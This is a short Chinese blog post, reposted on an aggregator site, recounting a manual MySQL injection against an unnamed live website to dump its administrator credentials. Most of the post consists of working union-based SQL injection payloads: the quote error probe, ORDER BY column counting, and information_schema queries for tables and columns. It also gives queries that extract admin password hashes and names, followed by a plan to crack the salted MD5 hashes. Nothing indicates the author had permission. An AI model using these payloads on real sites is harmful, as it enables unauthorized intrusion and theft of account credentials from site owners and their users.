码迷,mamicode.com
首页 > 数据库 > 详细

mysql手工注入

时间:2016-11-28 01:34:35      阅读:184      评论:0      收藏:0      [点我收藏+]

标签:mysql手工注入

  今天想实际做一下mysql手工注入,于是找到了某某网站

  首先在URL后加一个‘ 报错,说明这个网站可能含有sql注入漏洞,可以进行下一步的测试

  目的就是看看能不能直接爆出用户名密码 先用order by看一下这个字段数量

 使用and 1=2 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema = database()抱着试一试的心情看看能不能爆出数据库的表名

  这里主要是用到了mysql里边的那个元数据库

  执行这个语句后可以看到admin表,里密码不远了

  使用这个语句查看一下admin表里边都有什么这里最后table_name需要用HEX

  and 1=2 union select 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name = 0x61646D696E

  执行这个语句后发现admin表里边有和用户名密码有关的字段,接下来我们看一下admin表下和用户名密码有关的字段的内容

  使用语句:

  and 1=2 union select 1,group_concat(admin_password),3,4,5,6,7,8 from admin

  and 1=2 union select 1,group_concat(admin_firstname),3,4,5,6,7,8 from admin

  and 1=2 union select 1,group_concat(admin_lastname),3,4,5,6,7,8 from admin

这个网站的用户名是存放在两个字段里的,爆出之后需要拼接起来

重要的是密码是三个,两个md5($password,$salt),一个md5,接下来就是找网站解开这三个,这个网站的管理员用户名密码就通过手工注入的方式爆出来了。


mysql手工注入

标签:mysql手工注入

原文地址:http://huituzi.blog.51cto.com/11569625/1877091

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!